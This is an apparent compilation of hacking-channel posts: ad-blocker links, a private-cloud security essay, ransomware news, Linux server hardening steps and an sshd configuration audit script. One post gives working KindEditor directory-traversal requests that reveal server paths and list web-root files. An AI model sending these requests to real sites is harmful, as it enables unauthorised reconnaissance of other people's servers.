UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Best working Android ad blockers:

https://f-droid.org/en/packages/org.adaway/

https://adblockplus.org/

https://adguard.com/en/adguard-android/overview.html

https://play.google.com/store/apps/details?id=com.android.chrome

https://block-this.com/

by Android Authority
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 KindEditor directory traversal 0day:

KindEditor is an open source HTML visual editor, mainly used to give users WYSIWYG editing on websites. It is compatible with mainstream browsers such as IE, Firefox, Chrome, Safari and Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs. It is well suited to CMS, shopping malls, forums, blogs, wikis, email and other Internet applications. Since the first release of 2.0 in July 2006, KindEditor has continued to expand its share of the editor market with its excellent user experience and leading technology, and has become one of the most popular editors in China.

🦑 How to use:

1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
// With path=/, the response reveals the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php

2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
// Based on the absolute path revealed above, change the value of path to AppServ/www/67cms/
// All files and file names under D:/AppServ/www/67cms/ are then listed.


don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Explanation of the security of private cloud (cloud computing):

1) First of all, the technical foundation of cloud computing is a management program, the hypervisor. The hypervisor can isolate computing (and the related security threats) from traditional security tools, which check network communications for inappropriate or malicious data packets.

2) Since virtual machines on the same server can communicate entirely through the hypervisor, data packets can be sent from one virtual machine to another without passing through a physical network. Security devices, as generally installed, check the traffic on the physical network.

3) Crucially, this means that if a virtual machine is compromised, it can send dangerous traffic to another virtual machine without the organization's protective measures even being aware of it. In other words, an insecure application can lead to attacks on other virtual machines, and the security measures adopted by the user are powerless.
From this, it is concluded that private clouds are also insecure.

4) I have no opinion on the overall theory above, but isn't the conclusion a bit too arbitrary? The security issues above do exist, but we have to see that they are brought about not by private clouds but by virtualization. As the biggest difference between cloud computing and traditional computing, the problem of virtualization is real and will continue for some time to come.

5) The view that "public cloud is not secure, private cloud is secure" is of course incorrect. We can modify it to "private cloud is safer than public cloud". On the one hand, the private cloud is deployed within the boundaries of the enterprise's own data center. Compared with the public cloud, it has a greater guarantee for data security, and it will not cause any damage to the provider due to security issues. It is equivalent to storing our data in our own safe.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Cheap malicious programs hijack your computer and force you to pay a ransom:

The trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through floods of advertisements, but to lock your computer and prevent you from doing anything unless you hand over a ransom.

1) With the development of the times, the trend of contemporary Trojan horse malware is not just to crash your computer or steal your bank password through floods of advertisements, but to lock your computer and prevent you from doing anything unless you pay a "ransom."

2) The recently popular "ransomware" was first discovered on the abuse.ch website and uses the malicious toolkit "Blackhole". Moreover, this cheap malicious program can be obtained through underground forums and infected systems, and it spreads easily across the Internet in the form of Adobe Flash Player, Adobe Reader or Java web plug-ins.

3) Once infected, the target system is locked, and users need to log in to the attackers' fake website and pay a "ransom" before they can use their computer normally. It is reported that the "ransomware" infections are most severe in Australia, France, Germany, the Netherlands, Switzerland and the United Kingdom. For example, in the United Kingdom, users have to pay £50 ($80) after being infected with this malware. However, even though the user regains control of the computer after unlocking, the Aldi Bot variant malware will still be installed, which may turn the machine into a bot ("broiler") for DDoS attacks.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Things to do after installing a Linux server:

1) Make sure a non-root user is configured.
Root is omnipotent and you don't need root rights all the time.

root is also a valid username on almost every Linux system. This means that if remote authentication is enabled, half of an attacker's job - getting a valid username - is done.

In addition, if an attacker can log on as root, no additional permissions are required to perform any action on the system.

For these reasons, it is best to log in as a non-root user and disable root logins for remote access using SSH (explained later).

🦑 How to do it?
We will assume that you are logged in as root.

Add a new user using the useradd command. Replace <username> with any username of your choice.

useradd <username>


Set a password using the passwd command for the newly added user:

passwd <username>


2) Make sure the non-root user has sudo permission.
Since you will be logging into this account remotely using Secure Shell (SSH), you will want to be able to perform privileged actions that require root access. This means that the account must have sudo permissions.

🦑 How to do it?
The process for creating a sudo user on Ubuntu and CentOS is similar, but the group you add the user to is different.

You must be logged in as root to complete this step.

On CentOS and Red Hat, the wheel group is the standard group used to grant sudo permission to users. Add a user to this group using the usermod command:

usermod -aG wheel <username>


Ubuntu uses the sudo group to manage sudo users.

usermod -aG sudo <username>

3) Enabling SSH Key Based Authentication
It is important that key based authentication is enabled for SSH so that it works when we disable password based authentication.

Cracked or compromised passwords are a very common way for attackers to gain access to systems. Spear phishing, spamming that prompts an unsuspecting user to provide credentials, is just one of the common methods of obtaining credentials.

If someone gets your username and password on a system that has key-based authentication enabled and password-based authentication disabled for remote SSH access, the stolen password will no longer grant them access to that server.

4) Make sure SSH is allowed through the ufw firewall.
Before you enable the firewall on your system, you must make sure SSH is allowed. Otherwise, you may be locked out of your system when accessing it remotely.

🦑 How to do it?
Ubuntu uses Uncomplicated Firewall (ufw) and CentOS / Red Hat use firewalld.

On CentOS / Red Hat, use the firewall-cmd command:

sudo firewall-cmd --zone=public --add-service=ssh --permanent


On Ubuntu, use the ufw command like this:

sudo ufw allow ssh

5) Turn on firewall (only after SSH permission)
The firewall ensures that only specifically permitted traffic can enter your server. If an attacker gets malware onto your server and it tries to communicate through a prohibited port, or if a service is accidentally enabled, it cannot be used to compromise your server or to compromise it further.

🦑 How to do it?
On CentOS / Red Hat systems, enable the firewalld systemd service:

sudo systemctl start firewalld
sudo systemctl enable firewalld


On Ubuntu use this command:

sudo ufw enable


6) Configure SSH not to display the banner.
One of the ways an attacker can compromise your server is through bugs in the software that runs your services. The banner can display information about which version of OpenSSH or operating system you are using. There is no point in giving information to the bad guys. Make them work for it!


🦑 How to do it?
By default, no banner is displayed on CentOS / Red Hat, so no action is required.

On Ubuntu, you can use:

echo "DebianBanner no" | sudo tee -a /etc/ssh/sshd_config.d/10-my-sshd-settings.conf

7) Disable SSH forwarding.
While it is not uncommon for administrators to use SSH forwarding to encrypt traffic that might otherwise be in cleartext, if you are not using it, you should disable it. Forwarding can be used by an attacker to encrypt traffic so it is harder for you to view it, or to receive traffic that would otherwise be blocked from transmitting using an authorized port and service.


🦑 How to do it?
On CentOS / Red Hat, add the following to /etc/ssh/sshd_config:

DisableForwarding yes


On Ubuntu add DisableForwarding yes to the 10-my-sshd-settings.conf file:

echo "DisableForwarding yes" | sudo tee -a /etc/ssh/sshd_config.d/10-my-sshd-settings.conf
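
To check that the SSH settings from steps 1, 3 and 7 are really in effect, the following is an added example (not part of the original post) that audits sshd configuration text read on stdin. The function names, the sample config and the choice of PermitRootLogin, PasswordAuthentication, PubkeyAuthentication and DisableForwarding as the audited keywords are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original post: audit sshd settings read on stdin.
# sshd keywords are case-insensitive and sshd keeps the FIRST value it reads
# for a keyword; lines after the first Match are conditional and are skipped.
audit_sshd_config() {
    awk '
    BEGIN {
        n = split("permitrootlogin passwordauthentication pubkeyauthentication disableforwarding", keys, " ")
        # want: values for steps 1, 3 and 7; dflt: upstream OpenSSH defaults.
        want["permitrootlogin"] = "no";        dflt["permitrootlogin"] = "prohibit-password"
        want["passwordauthentication"] = "no"; dflt["passwordauthentication"] = "yes"
        want["pubkeyauthentication"] = "yes";  dflt["pubkeyauthentication"] = "yes"
        want["disableforwarding"] = "yes";     dflt["disableforwarding"] = "no"
    }
    { sub(/^[ \t]+/, "") }               # drop indentation
    $0 == "" || /^#/ { next }            # skip blank lines and comments
    tolower($1) == "match" { exit }      # the global section ends here
    {
        k = tolower($1); v = tolower($2); gsub(/"/, "", v)
        if (!(k in seen)) { seen[k] = 1; val[k] = v }
    }
    END {
        bad = 0
        for (i = 1; i <= n; i++) {
            k = keys[i]
            eff = (k in seen) ? val[k] : dflt[k]
            note = (k in seen) ? "" : " (default)"
            if (eff != want[k]) {
                printf "FAIL %s: %s%s, want %s\n", k, eff, note, want[k]
                bad = 1
            }
        }
        exit bad
    }'
}

# Constructed sample: duplicate keyword plus a setting hidden inside Match.
sample_config() {
    cat <<'EOF'
PermitRootLogin no
PasswordAuthentication yes
PubkeyAuthentication yes
passwordauthentication no
Match User backup
    DisableForwarding yes
EOF
}

sample_config | audit_sshd_config || true
```

On a live server, sudo sshd -T | audit_sshd_config audits the effective configuration, with included files already merged.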

